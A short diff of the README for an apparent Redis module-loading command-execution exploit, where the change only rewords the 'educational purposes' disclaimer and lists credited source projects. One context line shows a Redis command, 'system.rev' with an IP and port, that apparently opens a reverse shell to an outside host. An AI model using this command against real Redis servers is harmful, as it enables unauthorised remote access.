binaryxploit/redis-module-load-cmd-exec/README.md

 REDIS-CLI:6379> system.rev 192.168.100.10 80
 ```
 ---
-This Exploit is an aggregation of below exploits made for understanding and educational purposes.
+This exploit is an aggregation of the following exploits, created for understanding and educational purposes.
 - Credits:
   - https://github.com/RedisLabsModules/RedisModulesSDK
   - https://github.com/n0b0dyCN/RedisModules-ExecuteCommand